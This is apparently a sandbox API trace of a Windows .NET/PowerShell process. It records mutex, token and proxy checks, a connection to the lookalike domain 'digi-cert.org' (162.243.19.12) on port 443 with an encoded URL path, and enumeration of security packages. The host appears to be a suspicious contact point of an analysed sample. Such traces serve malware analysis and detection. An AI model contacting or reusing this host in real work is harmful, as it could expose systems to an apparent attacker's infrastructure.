	[0122.598] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ad236d0758, cbSid=0xd7ef71e1a0 | out: pSid=0x2ad236d0758*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xd7ef71e1a0) returned 1
	[0122.598] CreateMutexW (lpMutexAttributes=0x2ad236d0910, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b8
	[0122.598] WaitForSingleObject (hHandle=0x6b8, dwMilliseconds=0x1f4) returned 0x0
	[0122.598] ReleaseMutex (hMutex=0x6b8) returned 1
	[0122.598] CloseHandle (hObject=0x6b8) returned 1
	[0122.598] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ad236d13e0, cbSid=0xd7ef71e1a0 | out: pSid=0x2ad236d13e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xd7ef71e1a0) returned 1
	[0122.599] CreateMutexW (lpMutexAttributes=0x2ad236d1598, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b8
	[0122.599] WaitForSingleObject (hHandle=0x6b8, dwMilliseconds=0x1f4) returned 0x0
	[0122.599] ReleaseMutex (hMutex=0x6b8) returned 1
	[0122.599] CloseHandle (hObject=0x6b8) returned 1
	[0122.599] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ad236d2078, cbSid=0xd7ef71e1a0 | out: pSid=0x2ad236d2078*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xd7ef71e1a0) returned 1
	[0122.599] CreateMutexW (lpMutexAttributes=0x2ad236d2230, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b8
	[0122.599] WaitForSingleObject (hHandle=0x6b8, dwMilliseconds=0x1f4) returned 0x0
	[0122.600] ReleaseMutex (hMutex=0x6b8) returned 1
	[0122.600] CloseHandle (hObject=0x6b8) returned 1
	[0122.600] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ad236d2d08, cbSid=0xd7ef71e1a0 | out: pSid=0x2ad236d2d08*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xd7ef71e1a0) returned 1
	[0122.600] CreateMutexW (lpMutexAttributes=0x2ad236d2ec0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b8
	[0122.600] WaitForSingleObject (hHandle=0x6b8, dwMilliseconds=0x1f4) returned 0x0
	[0122.600] ReleaseMutex (hMutex=0x6b8) returned 1
	[0122.601] CloseHandle (hObject=0x6b8) returned 1
	[0122.602] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ad236d3998, cbSid=0xd7ef71e150 | out: pSid=0x2ad236d3998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xd7ef71e150) returned 1
	[0122.602] CreateMutexW (lpMutexAttributes=0x2ad236d3b50, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b8
	[0122.602] WaitForSingleObject (hHandle=0x6b8, dwMilliseconds=0x1f4) returned 0x0
	[0122.603] ReleaseMutex (hMutex=0x6b8) returned 1
	[0122.603] CloseHandle (hObject=0x6b8) returned 1
	[0122.603] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ad236d4618, cbSid=0xd7ef71e150 | out: pSid=0x2ad236d4618*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xd7ef71e150) returned 1
	[0122.603] CreateMutexW (lpMutexAttributes=0x2ad236d47d0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b8
	[0122.603] WaitForSingleObject (hHandle=0x6b8, dwMilliseconds=0x1f4) returned 0x0
	[0122.604] ReleaseMutex (hMutex=0x6b8) returned 1
	[0122.604] CloseHandle (hObject=0x6b8) returned 1
	[0122.604] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ad236d5290, cbSid=0xd7ef71e150 | out: pSid=0x2ad236d5290*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xd7ef71e150) returned 1
	[0122.604] CreateMutexW (lpMutexAttributes=0x2ad236d5448, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b8
	[0122.604] WaitForSingleObject (hHandle=0x6b8, dwMilliseconds=0x1f4) returned 0x0
	[0122.604] ReleaseMutex (hMutex=0x6b8) returned 1
	[0122.604] CloseHandle (hObject=0x6b8) returned 1
	[0122.605] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ad236d5f18, cbSid=0xd7ef71e150 | out: pSid=0x2ad236d5f18*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xd7ef71e150) returned 1
	[0122.605] CreateMutexW (lpMutexAttributes=0x2ad236d60d0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b8
	[0122.605] WaitForSingleObject (hHandle=0x6b8, dwMilliseconds=0x1f4) returned 0x0
	[0122.605] ReleaseMutex (hMutex=0x6b8) returned 1
	[0122.605] CloseHandle (hObject=0x6b8) returned 1
	[0122.605] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ad236d6b98, cbSid=0xd7ef71e150 | out: pSid=0x2ad236d6b98*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xd7ef71e150) returned 1
	[0122.605] CreateMutexW (lpMutexAttributes=0x2ad236d6d50, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b8
	[0122.605] WaitForSingleObject (hHandle=0x6b8, dwMilliseconds=0x1f4) returned 0x0
	[0122.606] ReleaseMutex (hMutex=0x6b8) returned 1
	[0122.606] CloseHandle (hObject=0x6b8) returned 1
	[0122.610] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55e90
	[0122.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55e90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.610] CoTaskMemFree (pv=0x2ad22d55e90) 
	[0122.611] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54620
	[0122.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.611] CoTaskMemFree (pv=0x2ad22d54620) 
	[0122.708] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54620
	[0122.708] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.708] CoTaskMemFree (pv=0x2ad22d54620) 
	[0122.719] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6b8
	[0122.719] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6c8
	[0123.001] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.001] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71dd18 | out: TokenHandle=0xd7ef71dd18*=0x6cc) returned 1
	[0123.005] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.005] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71dd18 | out: TokenHandle=0xd7ef71dd18*=0x6d0) returned 1
	[0123.008] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.008] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71e358 | out: TokenHandle=0xd7ef71e358*=0x6d4) returned 1
	[0123.044] CoTaskMemAlloc (cb=0xcd0) returned 0x2ad3bab4680
	[0123.044] RasEnumConnectionsW (in: param_1=0x2ad3bab4680, param_2=0xd7ef71e37c, param_3=0xd7ef71e378 | out: param_1=0x2ad3bab4680, param_2=0xd7ef71e37c, param_3=0xd7ef71e378) returned 0x0
	[0123.051] CoTaskMemFree (pv=0x2ad3bab4680) 
	[0123.055] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xd7ef71e188 | out: lpWSAData=0xd7ef71e188) returned 0
	[0123.058] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x710
	[0123.058] setsockopt (s=0x710, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0123.058] closesocket (s=0x710) returned 0
	[0123.058] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x710
	[0123.059] setsockopt (s=0x710, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0123.059] closesocket (s=0x710) returned 0
	[0123.059] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x710
	[0123.059] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x714
	[0123.060] ioctlsocket (in: s=0x710, cmd=-2147195266, argp=0xd7ef71e3a8 | out: argp=0xd7ef71e3a8) returned 0
	[0123.061] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x718
	[0123.061] ioctlsocket (in: s=0x718, cmd=-2147195266, argp=0xd7ef71e3a8 | out: argp=0xd7ef71e3a8) returned 0
	[0123.064] WSAIoctl (in: s=0x710, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xd7ef71e2e8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xd7ef71e2e8, lpOverlapped=0x0) returned -1
	[0123.064] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069e460
	[0123.064] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2ad2069e460, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0123.065] CoTaskMemFree (pv=0x2ad2069e460) 
	[0123.065] WSAEventSelect (s=0x710, hEventObject=0x714, lNetworkEvents=512) returned 0
	[0123.065] WSAIoctl (in: s=0x718, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xd7ef71e2e8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xd7ef71e2e8, lpOverlapped=0x0) returned -1
	[0123.065] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069e460
	[0123.065] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2ad2069e460, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0123.065] WSAEventSelect (s=0x718, hEventObject=0x71c, lNetworkEvents=512) returned 0
	[0123.066] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x720, param_3=0x3) returned 0x0
	[0123.068] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71e480 | out: phkResult=0xd7ef71e480*=0x738) returned 0x0
	[0123.069] RegOpenKeyExW (in: hKey=0x738, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71e368 | out: phkResult=0xd7ef71e368*=0x73c) returned 0x0
	[0123.070] RegNotifyChangeKeyValue (hKey=0x73c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x740, fAsynchronous=1) returned 0x0
	[0123.070] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71e390 | out: phkResult=0xd7ef71e390*=0x744) returned 0x0
	[0123.071] RegNotifyChangeKeyValue (hKey=0x744, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x748, fAsynchronous=1) returned 0x0
	[0123.071] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71e390 | out: phkResult=0xd7ef71e390*=0x74c) returned 0x0
	[0123.071] RegNotifyChangeKeyValue (hKey=0x74c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x750, fAsynchronous=1) returned 0x0
	[0123.071] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71e2f8 | out: TokenHandle=0xd7ef71e2f8*=0x754) returned 1
	[0123.072] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71d418 | out: phkResult=0xd7ef71d418*=0x758) returned 0x0
	[0123.073] RegQueryValueExW (in: hKey=0x758, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0xd7ef71d42c, lpData=0x0, lpcbData=0xd7ef71d428*=0x0 | out: lpType=0xd7ef71d42c*=0x0, lpData=0x0, lpcbData=0xd7ef71d428*=0x0) returned 0x2
	[0123.083] RegCloseKey (hKey=0x758) returned 0x0
	[0123.089] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad22d11200
	[0123.090] WinHttpSetTimeouts (hInternet=0x2ad22d11200, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0123.091] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71e3d8 | out: pProxyConfig=0xd7ef71e3d8) returned 1
	[0123.320] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.320] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71d9a8 | out: TokenHandle=0xd7ef71d9a8*=0x774) returned 1
	[0123.328] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.328] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71d9a8 | out: TokenHandle=0xd7ef71d9a8*=0x778) returned 1
	[0123.339] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.339] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71d978 | out: TokenHandle=0xd7ef71d978*=0x77c) returned 1
	[0123.342] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.342] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71d978 | out: TokenHandle=0xd7ef71d978*=0x780) returned 1
	[0123.353] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.353] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71d818 | out: TokenHandle=0xd7ef71d818*=0x784) returned 1
	[0123.356] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.356] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71d818 | out: TokenHandle=0xd7ef71d818*=0x788) returned 1
	[0123.369] WinHttpGetProxyForUrl (in: hSession=0x2ad22d11200, lpcwszUrl="https://digi-cert.org/MFEwRzBNMEswSAAJBgUrCgMCHgUABBSAUQYBMq2awn1Rh6Doh", pAutoProxyOptions=0xd7ef71de58, pProxyInfo=0xd7ef71de28 | out: pProxyInfo=0xd7ef71de28) returned 0
	[0123.375] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71d7a8 | out: TokenHandle=0xd7ef71d7a8*=0x7a4) returned 1
	[0123.376] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71d7a8 | out: TokenHandle=0xd7ef71d7a8*=0x7a0) returned 1
	[0123.390] SetEvent (hEvent=0x6b8) returned 1
	[0123.401] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0xd7ef71dbb8 | out: pFixedInfo=0x0, pOutBufLen=0xd7ef71dbb8) returned 0x6f
	[0123.408] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x2ad3baab5d0
	[0123.408] GetNetworkParams (in: pFixedInfo=0x2ad3baab5d0, pOutBufLen=0xd7ef71dbb8 | out: pFixedInfo=0x2ad3baab5d0, pOutBufLen=0xd7ef71dbb8) returned 0x0
	[0123.413] CoTaskMemAlloc (cb=0xd) returned 0x2ad3bab7910
	[0123.413] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0123.414] CoTaskMemFree (pv=0x2ad3bab7910) 
	[0123.415] LocalFree (hMem=0x2ad3baab5d0) returned 0x0
	[0123.426] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0123.427] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x79c
	[0123.429] getaddrinfo (in: pNodeName="digi-cert.org", pServiceName=0x0, pHints=0xd7ef71db60*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xd7ef71db58 | out: ppResult=0xd7ef71db58*=0x2ad3baa9cb0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="digi-cert.org", ai_addr=0x2ad3bab78f0*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) returned 0
	[0123.460] CoTaskMemFree (pv=0x2ad3bab7bf0) 
	[0123.460] CoTaskMemFree (pv=0x0) 
	[0123.461] FreeAddrInfoW (pAddrInfo=0x2ad3baa9cb0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="楤楧挭牥⹴牯g", ai_addr=0x2ad3bab78f0*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) 
	[0123.462] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d8
	[0123.462] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7d4
	[0123.462] ioctlsocket (in: s=0x7d8, cmd=-2147195266, argp=0xd7ef71db78 | out: argp=0xd7ef71db78) returned 0
	[0123.462] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7dc
	[0123.462] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7e0
	[0123.462] ioctlsocket (in: s=0x7dc, cmd=-2147195266, argp=0xd7ef71db78 | out: argp=0xd7ef71db78) returned 0
	[0123.462] WSAIoctl (in: s=0x7d8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xd7ef71dab8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xd7ef71dab8, lpOverlapped=0x0) returned -1
	[0123.462] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069e460
	[0123.462] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2ad2069e460, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0123.462] WSAEventSelect (s=0x7d8, hEventObject=0x7d4, lNetworkEvents=512) returned 0
	[0123.463] WSAIoctl (in: s=0x7dc, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xd7ef71dab8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xd7ef71dab8, lpOverlapped=0x0) returned -1
	[0123.463] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069e460
	[0123.463] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2ad2069e460, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0123.463] WSAEventSelect (s=0x7dc, hEventObject=0x7e0, lNetworkEvents=512) returned 0
	[0123.464] GetAdaptersAddresses () returned 0x6f
	[0123.465] LocalAlloc (uFlags=0x0, uBytes=0xc20) returned 0x2ad3babb440
	[0123.466] GetAdaptersAddresses () returned 0x0
	[0123.470] LocalFree (hMem=0x2ad3babb440) returned 0x0
	[0123.472] WSAConnect (in: s=0x7d0, name=0x2ad237c6628*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0123.684] closesocket (s=0x79c) returned 0
	[0123.702] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v2.0.50727", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71dad8 | out: phkResult=0xd7ef71dad8*=0x79c) returned 0x0
	[0123.702] RegQueryValueExW (in: hKey=0x79c, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0xd7ef71da5c, lpData=0x0, lpcbData=0xd7ef71da58*=0x0 | out: lpType=0xd7ef71da5c*=0x0, lpData=0x0, lpcbData=0xd7ef71da58*=0x0) returned 0x2
	[0123.703] RegCloseKey (hKey=0x79c) returned 0x0
	[0123.710] EnumerateSecurityPackagesW (in: pcPackages=0xd7ef71d9d8, ppPackageInfo=0xd7ef71d9d0 | out: pcPackages=0xd7ef71d9d8, ppPackageInfo=0xd7ef71d9d0) returned 0x0
	[0123.712] lstrlenW (lpString="Negotiate") returned 9
	[0123.712] CoTaskMemAlloc (cb=0x16) returned 0x2ad3bab7830
	[0123.712] RtlMoveMemory (in: Destination=0x2ad3bab7830, Source=0x2ad3baccba0, Length=0x14 | out: Destination=0x2ad3bab7830) 
	[0123.713] CoTaskMemFree (pv=0x2ad3bab7830) 
	[0123.713] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0123.713] CoTaskMemAlloc (cb=0x3c) returned 0x2ad3bab0b00
	[0123.713] RtlMoveMemory (in: Destination=0x2ad3bab0b00, Source=0x2ad3baccbb4, Length=0x3a | out: Destination=0x2ad3bab0b00) 
	[0123.713] CoTaskMemFree (pv=0x2ad3bab0b00) 
	[0123.713] lstrlenW (lpString="NegoExtender") returned 12
	[0123.713] CoTaskMemAlloc (cb=0x1c) returned 0x2ad22d5c080
	[0123.713] RtlMoveMemory (in: Destination=0x2ad22d5c080, Source=0x2ad3baccbee, Length=0x1a | out: Destination=0x2ad22d5c080) 
	[0123.713] CoTaskMemFree (pv=0x2ad22d5c080) 
	[0123.713] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0123.713] CoTaskMemAlloc (cb=0x3e) returned 0x2ad3bab0fb0
	[0123.713] RtlMoveMemory (in: Destination=0x2ad3bab0fb0, Source=0x2ad3baccc08, Length=0x3c | out: Destination=0x2ad3bab0fb0) 
	[0123.713] CoTaskMemFree (pv=0x2ad3bab0fb0) 
	[0123.713] lstrlenW (lpString="Kerberos") returned 8
	[0123.713] CoTaskMemAlloc (cb=0x14) returned 0x2ad3bab77b0
	[0123.713] RtlMoveMemory (in: Destination=0x2ad3bab77b0, Source=0x2ad3baccc44, Length=0x12 | out: Destination=0x2ad3bab77b0) 
	[0123.713] CoTaskMemFree (pv=0x2ad3bab77b0) 
	[0123.713] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0123.713] CoTaskMemAlloc (cb=0x32) returned 0x2ad3baa94f0
	[0123.713] RtlMoveMemory (in: Destination=0x2ad3baa94f0, Source=0x2ad3baccc56, Length=0x30 | out: Destination=0x2ad3baa94f0) 
	[0123.713] CoTaskMemFree (pv=0x2ad3baa94f0) 
	[0123.713] lstrlenW (lpString="NTLM") returned 4
	[0123.713] CoTaskMemAlloc (cb=0xc) returned 0x2ad3bab7a10
	[0123.713] RtlMoveMemory (in: Destination=0x2ad3bab7a10, Source=0x2ad3baccc86, Length=0xa | out: Destination=0x2ad3bab7a10) 
	[0123.713] CoTaskMemFree (pv=0x2ad3bab7a10) 
	[0123.713] lstrlenW (lpString="NTLM Security Package") returned 21
	[0123.713] CoTaskMemAlloc (cb=0x2e) returned 0x2ad3baa9670
	[0123.713] RtlMoveMemory (in: Destination=0x2ad3baa9670, Source=0x2ad3baccc90, Length=0x2c | out: Destination=0x2ad3baa9670) 
	[0123.713] CoTaskMemFree (pv=0x2ad3baa9670) 
	[0123.714] lstrlenW (lpString="TSSSP") returned 5
	[0123.714] CoTaskMemAlloc (cb=0xe) returned 0x2ad3bab7ab0
	[0123.714] RtlMoveMemory (in: Destination=0x2ad3bab7ab0, Source=0x2ad3bacccbc, Length=0xc | out: Destination=0x2ad3bab7ab0) 
	[0123.714] CoTaskMemFree (pv=0x2ad3bab7ab0) 
	[0123.714] lstrlenW (lpString="TS Service Security Package") returned 27
	[0123.714] CoTaskMemAlloc (cb=0x3a) returned 0x2ad3bab0b00
	[0123.714] RtlMoveMemory (in: Destination=0x2ad3bab0b00, Source=0x2ad3bacccc8, Length=0x38 | out: Destination=0x2ad3bab0b00) 
	[0123.714] CoTaskMemFree (pv=0x2ad3bab0b00) 
	[0123.714] lstrlenW (lpString="pku2u") returned 5
	[0123.714] CoTaskMemAlloc (cb=0xe) returned 0x2ad3bab7b70
	[0123.714] RtlMoveMemory (in: Destination=0x2ad3bab7b70, Source=0x2ad3baccd00, Length=0xc | out: Destination=0x2ad3bab7b70) 
	[0123.714] CoTaskMemFree (pv=0x2ad3bab7b70) 
	[0123.714] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0123.714] CoTaskMemAlloc (cb=0x30) returned 0x2ad3baa9df0
	[0123.714] RtlMoveMemory (in: Destination=0x2ad3baa9df0, Source=0x2ad3baccd0c, Length=0x2e | out: Destination=0x2ad3baa9df0) 
	[0123.714] CoTaskMemFree (pv=0x2ad3baa9df0) 
	[0123.714] lstrlenW (lpString="CloudAP") returned 7
	[0123.714] CoTaskMemAlloc (cb=0x12) returned 0x2ad3bab7e10
	[0123.714] RtlMoveMemory (in: Destination=0x2ad3bab7e10, Source=0x2ad3baccd3a, Length=0x10 | out: Destination=0x2ad3bab7e10) 
	[0123.714] CoTaskMemFree (pv=0x2ad3bab7e10) 
	[0123.714] lstrlenW (lpString="Cloud AP Security Package") returned 25
	[0123.714] CoTaskMemAlloc (cb=0x36) returned 0x2ad3baa9e70
	[0123.714] RtlMoveMemory (in: Destination=0x2ad3baa9e70, Source=0x2ad3baccd4a, Length=0x34 | out: Destination=0x2ad3baa9e70) 
	[0123.714] CoTaskMemFree (pv=0x2ad3baa9e70) 
	[0123.714] lstrlenW (lpString="WDigest") returned 7
	[0123.714] CoTaskMemAlloc (cb=0x12) returned 0x2ad3bab7770
	[0123.714] RtlMoveMemory (in: Destination=0x2ad3bab7770, Source=0x2ad3baccd7e, Length=0x10 | out: Destination=0x2ad3bab7770) 
	[0123.714] CoTaskMemFree (pv=0x2ad3bab7770) 
	[0123.714] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0123.714] CoTaskMemAlloc (cb=0x46) returned 0x2ad3bab0b00
	[0123.714] RtlMoveMemory (in: Destination=0x2ad3bab0b00, Source=0x2ad3baccd8e, Length=0x44 | out: Destination=0x2ad3bab0b00) 
	[0123.714] CoTaskMemFree (pv=0x2ad3bab0b00) 
	[0123.714] lstrlenW (lpString="Schannel") returned 8
	[0123.714] CoTaskMemAlloc (cb=0x14) returned 0x2ad3bab7c90
	[0123.715] RtlMoveMemory (in: Destination=0x2ad3bab7c90, Source=0x2ad3baccdd2, Length=0x12 | out: Destination=0x2ad3bab7c90) 
